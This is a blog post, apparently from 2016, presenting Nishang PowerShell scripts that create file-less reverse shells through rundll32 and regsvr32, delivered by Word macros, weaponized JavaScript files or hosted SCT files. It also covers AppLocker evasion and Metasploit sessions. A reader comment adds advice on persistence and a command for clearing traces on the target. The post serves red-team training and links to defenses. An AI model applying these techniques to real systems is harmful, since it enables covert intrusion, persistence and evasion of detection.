I have been following Casey Smith's brilliant work on JavaScript and COM Scriptlets. After looking at his work, I started playing with the code. I was interested in developing easy and customizable ways to use JavaScript, SCT files, rundll32 and regvr32 for...well...interesting things. After using some weeknights and weekends, I give you following PowerShell scripts (all available in Nishang):
Invoke-JSRatRundll
Based on JSRAT by Casey, Invoke-JSRatRundll uses rundll32.exe to execute JavaScript on a target which provides a Reverse PowerShell Shell over HTTP. Why? Because it is so cool. Also, it is file-less, the client part is just a single command and most importantly, another method to pwn targets :) The script and the client part are intelligent enough to figure out if there is a proxy in use and also to use first proxy from multiple proxies from Internet Explorer settings. Also, based on the method mentioned here, Invoke-JSRatRundll doesn't leaver rundll32.exe running on the target, when "exit" command is used from the spawned reverse shell, so a clean exit.
The listener, on the attacker's machine, needs to be run from elevated PowerShell session.
This is how it looks like in action:
Start the listener
Start the listener
The above listener provides the following command to be run on a target. Please note that will need to remove newlines:
When the command is executed on the target:
We get a connect back on the listener:
Nice! A proxy aware, file-less, Reverse PowerShell Session.
We get a connect back on the listener:
Nice! A proxy aware, file-less, Reverse PowerShell Session.
The client part (one-line command) can be used whenever we have the ability to execute a command on the target. Below is an example of using the client part with Out-Word from Nishang. Note that the the double quotes in client part need to be escaped by using double-quotes two times.
When a target user opens the Word file and chooses to enable Macros, the listener will receive a connect back from the target machine. Bingo!
When a target user opens the Word file and chooses to enable Macros, the listener will receive a connect back from the target machine. Bingo!
One thing to note in Invoke-JSRatRundll is that a window pops-up temporarily whenever a command is executed on the target. It is because of the use of Exec method of WScript. The Run method which provides for silent execution could not be used as it did not return the output without storing the output temporarily somewhere on the target.
Invoke-JSRatRegsvr
This script utilizes regsvr32.exe for providing a Reverse PowerShell session over HTTP. Use of regsvr32, the technique which has been termed as "Squiblydoo", has added benefits. regsvr32.exe takes care of proxy by itself, the execution is file-less and AFAIK, leaves no traces on the target after a clean exit.
The listener needs to be run from an elevated PowerShell on the attacker's machine. This is how it looks like in action:
The above listener provides the following command to be run on the target:
The above listener provides the following command to be run on the target:
As soon as the command is executed on a target, using a client side attack, or any other method:
Great!
Great!
This script also shows a window momentarily on the target machine for the same reason as Invoke-JSRatRundll
Out-RundllCommand
Use this script to generate rundll32.exe one line commands. The generated command can be used on a target to run PowerShell commands and scripts or a reverse PowerShell session over TCP.
Here is how to generate a command.
Now, if the rundll32 command is executed on a target using client side attack or other methods, the payload will get executed.
During testing it was not possible to execute larger scripts (specially the encoded ones due to the increased length). The added advantage with this script is it can be used with a simple netcat listener on a Linux machine as well. There is no need to run a special listener unlike in the above two scripts.
Here is how to generate a command.
Now, if the rundll32 command is executed on a target using client side attack or other methods, the payload will get executed.
During testing it was not possible to execute larger scripts (specially the encoded ones due to the increased length). The added advantage with this script is it can be used with a simple netcat listener on a Linux machine as well. There is no need to run a special listener unlike in the above two scripts.
Start a netcat/Powercat listener. Run Out-RundllCommand with the -Reverse switch:
When the generated rundll32 command is executed on the target:
When the generated rundll32 command is executed on the target:
Nice!
Also, the execution is silent on the target machine. Please note that this script leaves rundll32.exe running on the target machine.
Out-JS
This script is useful for client side attacks. Using this script, we can create "weaponized" JavaScript files which can be sent to a target user to execute PowerShell scripts and commands. Once a user executes the file (a double click opens the file using Windows Script Host, wscript.exe), the specified payload gets executed on the target with the privileges of the current user. The default name of the generated file is Style.js.
Once again, it was not possible to execute large scripts, therefore, there is no option of specifying a script path. An example is included in the script to execute a reverse PowerShell session over TCP.
Out-SCT
This script generates a SCT file which can be used with regsvr32.exe to execute PowerShell scripts and commands. The default name of the generated file is UpdateCheck.xml. This file needs to be hosted on a web server and the one-liner regsvr is to be executed on the target. Note that, in case a PayloadURL is provided, two connections are made from the target environment. This first one to pull the SCT file and the second one to download the PowerShell script.
Like Out-JS only small scripts can be executed using Out-SCT. An example is included in the help of this script which explains usage of a Reverse PowerShell session over TCP without having to download a script.
Usage with metasploit
Some of the above scripts can be used to get a meterpreter session in the following ways:
Using Out-SCT
Pass the URL where meterprer PowerShell script is hosted to Out-SCT.
Now, host the generated SCT file on a web server. When the generated regsvr32 command is executed on a target, this will happen:
Awesome! A reverse HTTPS meterpreter from a file-less execution which is also helpful in avoiding Applocker!
Using Out-JS
Pass the URL to Out-JS.
When the generated Style,js is executed on a target, we will get a connect back on msfconsole!
Using Out-RundllCommand
Pass the URL to Out-RundllCommand.
Once again, when the generated rundll32 command is executed on a target, a meterpreter will pop-up in the msfconsole.
That is all for this post, all the scripts are available in the GitHub repository of Nishang. Hope you liked it. Please leave feedback and comments.
Join me for a two days training "Offensive PowerShell for Red and Blue Teams" at Shakacon, Honolulu (2 days - July 11th - 12th, 2016) - https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/
References/Further Readings
Casey and some of his work:
https://twitter.com/subTee
http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html
https://github.com/subTee/SCTPersistence
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
Detailed blog on JSRAT
http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
Defenses against regsvr32:
http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html
https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique
well done dude
ReplyDeleteThat was awesome!
ReplyDeleteCan you take me on Ethical Hacking?
Obotesco20@gmail.com
Bit late on this topic but that said. This is my go to technique when it comes to persistence. Adding regsvr32 to the registry (does not pop up the window) or to the wmi at startup gives great flexibility. Since we can edit the scriplet, and change the payload remotely. It's worth mentioning though that (at least on Win 10) the scriplet is being saved in temporary ie files. And being run from that location afterwards (instead of the webs). So it's a good practice to clear that up with "RunDll32.exe InetCpl.cpl, ClearMyTracksByProcess 8" for example. Cheers.
ReplyDeleteGood to know. Thanks!
Delete